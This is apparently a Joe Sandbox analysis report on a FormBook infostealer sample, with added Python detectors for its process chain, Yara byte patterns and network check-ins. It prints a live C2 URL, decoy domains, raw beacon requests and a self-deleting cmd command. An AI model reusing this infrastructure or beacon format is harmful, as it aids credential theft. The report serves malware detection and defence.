
Analysis Report 2435.bat

Overview

General Information

Sample Name: 2435.bat (renamed file extension from bat to exe)
Analysis ID: 433173
MD5: 862b4c2abad2c07ac13d5e051c18ab86
SHA1: c78f0a59312c7902e445c5a31d4896907e96475c
SHA256: c347c2d7579053d263f6ab6eddca7bd03691ebab93b30b5caba462caa7106beb
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • 2435.exe (PID: 6304 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)
    • 2435.exe (PID: 6340 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 3584 cmdline: /c del 'C:\Users\user\Desktop\2435.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
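The tree above is the chain that the "Sample uses process hollowing technique", "Queues an APC in another process" and "Maps a DLL or memory area into another process" signatures describe: the dropper starts a copy of itself, code is placed into explorer.exe, explorer.exe starts a 32-bit control.exe from SysWOW64, and that host runs cmd.exe to delete the original file. The following is an added example, not part of the Joe Sandbox report, showing how to pick this chain out of endpoint process-creation events. The event records and their field names (pid, ppid, image, cmdline) are constructed to mirror the tree; because the report's own signatures show explorer.exe is an injection target rather than a child process, it is given an unlogged parent here instead of 2435.exe.

```python
"""Flag the FormBook-style process chain from process-creation events.

Added example, not part of the Joe Sandbox report. Field names (pid, ppid,
image, cmdline) are an assumed schema; map them from Sysmon event 1 or
Windows 4688 in a real deployment.
"""
from collections import defaultdict
import ntpath
import re

# Constructed events modelled on the report's process tree. PIDs, images and
# command lines are taken from the tree; the parents of 2435.exe (6304) and
# explorer.exe (3472) are deliberately absent from the log.
EVENTS = [
    {"pid": 6304, "ppid": 1000, "image": r"C:\Users\user\Desktop\2435.exe",
     "cmdline": r"'C:\Users\user\Desktop\2435.exe'"},
    {"pid": 6340, "ppid": 6304, "image": r"C:\Users\user\Desktop\2435.exe",
     "cmdline": r"'C:\Users\user\Desktop\2435.exe'"},
    {"pid": 3472, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 6932, "ppid": 3472, "image": r"C:\Windows\SysWOW64\control.exe",
     "cmdline": r"C:\Windows\SysWOW64\control.exe"},
    {"pid": 3584, "ppid": 6932, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd.exe /c del 'C:\Users\user\Desktop\2435.exe'"},
    {"pid": 6292, "ppid": 3584, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# "cmd /c del [switches] <path>" with either quote style; the sandbox prints
# single quotes where Windows would show double quotes.
DEL_RE = re.compile(
    r"""/c\s+del\s+(?:/\w+\s+)*['"]?(?P<path>[^'"]+?)['"]?\s*$""", re.IGNORECASE)


def index_events(events):
    """Map pid -> event and ppid -> children."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    return by_pid, children


def find_self_spawns(events):
    """A process whose parent runs the same image (2435.exe -> 2435.exe here)."""
    by_pid, _ = index_events(events)
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent and parent["image"].lower() == e["image"].lower():
            hits.append((parent["pid"], e["pid"], e["image"]))
    return hits


def find_self_deletes(events):
    """cmd.exe deleting a path that is the image of some process in the log."""
    images = {e["image"].lower() for e in events}
    hits = []
    for e in events:
        if ntpath.basename(e["image"]).lower() != "cmd.exe":
            continue
        m = DEL_RE.search(e["cmdline"])
        if m and m.group("path").lower() in images:
            hits.append((e["pid"], m.group("path")))
    return hits


def ancestors(by_pid, pid):
    """Event chain from pid upwards, stopping at the first parent not in the log."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def formbook_chain(events):
    """Self-spawned dropper + explorer.exe -> SysWOW64 host -> cmd.exe deleting
    the dropper. Returns [cmd_pid, host_pid, explorer_pid] per match."""
    by_pid, _ = index_events(events)
    spawned = {img.lower() for _, _, img in find_self_spawns(events)}
    matches = []
    for cmd_pid, path in find_self_deletes(events):
        if path.lower() not in spawned:
            continue
        chain = ancestors(by_pid, cmd_pid)
        if (len(chain) >= 3
                and "\\syswow64\\" in chain[1]["image"].lower()
                and ntpath.basename(chain[2]["image"]).lower() == "explorer.exe"):
            matches.append([e["pid"] for e in chain[:3]])
    return matches


if __name__ == "__main__":
    print("self-spawn:", find_self_spawns(EVENTS))
    print("self-delete:", find_self_deletes(EVENTS))
    print("chain (cmd, host, explorer):", formbook_chain(EVENTS))
```

The correlation that matters is the last one: a cmd.exe deleting the image of a process that had already spawned a copy of itself, reached through a SysWOW64 binary under explorer.exe. Either half on its own (self-spawn, or cmd /c del of a user-writable path) is common enough in installers that it should be a low-severity signal at most.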

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author
0.2.2435.exe.24d0000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.2435.exe.24d0000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.2435.exe.24d0000.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
1.2.2435.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.2435.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
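The rule strings in the tables above are plain byte sequences, so the hits can be reproduced and inspected without YARA. The following is an added example, not part of the report and not the yara-signator or JPCERT/CC rules themselves: it scans a buffer for the report's patterns, reports offsets in the same form as the tables, and decodes the three JPCERT/CC strings, each of which is a `push imm32` (opcode 0x68), to the constant being pushed. The buffer is constructed here with a few patterns planted at chosen offsets, and the threshold in rule_fires() is an assumption, since the rules' conditions are not shown on this page. Note that $sequence_0 disassembles to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, a timing measurement consistent with the "RDTSC time measurements" signature.

```python
"""Scan a memory image for the Yara string hits listed in the report.

Added example; not part of the Joe Sandbox report or the cited rules. Hex
patterns are copied from the report; the scanned buffer is constructed.
"""
import struct

# Patterns exactly as the report prints them.
RULES = {
    # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax
    "sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "sequence_8": "3C 54 74 04 3C 74 75 F4",
    "sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
    # JPCERT/CC strings: each is "push imm32"
    "sqlite3step": "68 34 1C 7B E1",
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
}


def hex_to_bytes(s: str) -> bytes:
    return bytes.fromhex(s.replace(" ", ""))


def scan(buf: bytes, rules: dict) -> dict:
    """Return {name: [offsets]} for every pattern with at least one hit."""
    hits = {}
    for name, pat in rules.items():
        needle = hex_to_bytes(pat)
        offs, i = [], buf.find(needle)
        while i != -1:
            offs.append(i)
            i = buf.find(needle, i + 1)   # overlapping hits are reported too
        if offs:
            hits[name] = offs
    return hits


def push_imm32(pat: str) -> int:
    """Decode a 5-byte 'push imm32' (opcode 0x68) to the little-endian constant."""
    raw = hex_to_bytes(pat)
    if len(raw) != 5 or raw[0] != 0x68:
        raise ValueError("not a push imm32 pattern")
    return struct.unpack("<I", raw[1:])[0]


def rule_fires(hits: dict, prefix: str, need: int) -> bool:
    """Assumed condition: at least `need` distinct strings with the prefix matched."""
    return sum(1 for n in hits if n.startswith(prefix)) >= need


def build_sample() -> bytes:
    """Constructed buffer: int3 filler with patterns planted at known offsets."""
    buf = bytearray(b"\xcc" * 0x1000)
    plan = ((0x100, "sequence_0"), (0x4a0, "sequence_0"),
            (0x800, "sqlite3step"), (0x900, "sqlite3text"), (0x910, "sqlite3blob"))
    for off, name in plan:
        pat = hex_to_bytes(RULES[name])
        buf[off:off + len(pat)] = pat
    return bytes(buf)


SAMPLE = build_sample()

if __name__ == "__main__":
    for name, offs in sorted(scan(SAMPLE, RULES).items()):
        for off in offs:
            print(f"{off:#x}:${name}: {RULES[name]}")
    for name in ("sqlite3step", "sqlite3text", "sqlite3blob"):
        print(f"{name}: push 0x{push_imm32(RULES[name]):08X}")
```

The decoded constants (0xE17B1C34, 0xC5902A38, 0x8C7FD853) are what an analyst would pivot on in a disassembler: the rule's variable names indicate they stand in for sqlite3_step/column_text/column_blob, i.e. the sample resolves the SQLite routines it uses for credential-store access by constant rather than by name. On a real dump, read the file into `buf` and drop the planted sample.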

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp; Malware Configuration Extractor: FormBook {"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}
Multi AV Scanner detection for submitted file
Source: 2435.exe; ReversingLabs: Detection: 43%
Yara detected FormBook
Source: Yara match; File source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 2435.exe; Joe Sandbox ML: detected
Source: 1.1.2435.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.2435.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.2435.exe.24d0000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.control.exe.4d7f834.4.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.control.exe.43b090.1.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 2435.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP; source: 2435.exe, 00000000.00000003.228355721.0000000009B60000.00000004.00000001.sdmp, 2435.exe, 00000001.00000002.288517092.0000000000B6F000.00000040.00000001.sdmp, control.exe, 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp
Source: Binary string: control.pdb; source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: 2435.exe, control.exe
Source: Binary string: control.pdbUGP; source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\2435.exe; Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\2435.exe; Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\2435.exe; Code function: 0_2_0040263E FindFirstFileA,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.knighttechinca.com/dxe/
Source: global traffic; HTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1; Host: www.northsytyle.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1; Host: www.shitarpa.net; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1; Host: www.houseofsisson.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View; IP Address: 199.59.242.153
Source: Joe Sandbox View; ASN Name: BODIS-NJUS
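All three check-ins above carry the configured URI path /dxe/ and the same two query parameter names, but they go to hosts from the decoy list rather than to www.knighttechinca.com. FormBook beacons to decoys and to the real C2 alike, so the decoy domains show up on the wire even though they are not attacker infrastructure; that is why the Snort hits land on 199.59.242.153 and 34.102.136.180 rather than on the C2 host. The following is an added example, not part of the Joe Sandbox report, that classifies observed requests against the extracted configuration from the Malware Configuration section. The configuration and the first three requests are copied from this page (decoy list shortened to the entries needed); the last two requests and the verdict labels are constructed.

```python
"""Classify observed HTTP check-ins against the extracted FormBook config.

Added example, not part of the Joe Sandbox report. CONFIG and the first
three REQUESTS are copied from the report (decoy list shortened); the last
two requests and the verdict labels are constructed.
"""
from urllib.parse import urlsplit, parse_qsl

CONFIG = {
    "C2 list": ["www.knighttechinca.com/dxe/"],
    # Shortened; the report lists many more decoys.
    "decoy": ["sardarfarm.com", "northsytyle.com", "shitarpa.net", "houseofsisson.com"],
}

REQUESTS = [
    # From the report
    "GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1\r\n"
    "Host: www.northsytyle.com\r\nConnection: close\r\n",
    "GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1\r\n"
    "Host: www.shitarpa.net\r\nConnection: close\r\n",
    "GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1\r\n"
    "Host: www.houseofsisson.com\r\nConnection: close\r\n",
    # Constructed: the same beacon shape against the configured C2 host
    "GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=constructed HTTP/1.1\r\n"
    "Host: www.knighttechinca.com\r\nConnection: close\r\n",
    # Constructed: ordinary browsing to a decoy domain, not a beacon
    "GET /index.html HTTP/1.1\r\nHost: www.northsytyle.com\r\n",
]


def norm_host(host: str) -> str:
    host = host.strip().lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def load_config(cfg: dict):
    """Return ({c2_host: c2_path}, {decoy hosts})."""
    c2 = {}
    for entry in cfg["C2 list"]:
        host, _, path = entry.partition("/")
        c2[norm_host(host)] = "/" + path
    return c2, {norm_host(d) for d in cfg["decoy"]}


def parse_request(raw: str) -> dict:
    """Minimal HTTP/1.x request-line + header parser (enough for a beacon)."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    parts = urlsplit(target)
    return {"method": method, "host": norm_host(headers.get("host", "")),
            "path": parts.path,
            "params": [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]}


def classify(raw: str, cfg: dict) -> dict:
    """Verdicts: c2 (configured host+path), decoy (configured path on a decoy
    host), path-only (configured path on an unlisted host), unrelated."""
    c2, decoys = load_config(cfg)
    req = parse_request(raw)
    c2_paths = set(c2.values())
    if c2.get(req["host"]) == req["path"]:
        verdict = "c2"
    elif req["host"] in decoys and req["path"] in c2_paths:
        verdict = "decoy"
    elif req["path"] in c2_paths:
        verdict = "path-only"
    else:
        verdict = "unrelated"
    return {**req, "verdict": verdict}


def shared_params(raws) -> list:
    """Query parameter names common to every request: a per-build indicator."""
    sets = [set(parse_request(r)["params"]) for r in raws]
    return sorted(set.intersection(*sets)) if sets else []


def iocs(cfg: dict) -> dict:
    """Block the real C2; only watch decoys, which may be unrelated third-party sites."""
    c2, decoys = load_config(cfg)
    return {"block": [h + p for h, p in sorted(c2.items())], "watch": sorted(decoys)}


if __name__ == "__main__":
    for r in REQUESTS:
        c = classify(r, CONFIG)
        print(f'{c["verdict"]:10s} {c["host"]:24s} {c["path"]} params={c["params"]}')
    print("shared params:", shared_params(REQUESTS[:3]))
    print("iocs:", iocs(CONFIG))
```

The split between "block" and "watch" is deliberate: blocking every decoy domain from a FormBook config can cut off legitimate sites, while the C2 host plus the /dxe/ path, and the parameter names Wj0xll and EDHT4Ftp that every check-in shares, are specific to this build.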
Source: unknown; DNS traffic detected: queries for: www.northsytyle.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: control.exe, 00000009.00000002.499880225.000000000526F000.00000004.00000001.sdmp; String found in binary or memory: http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDI
Source: 2435.exe; String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 2435.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
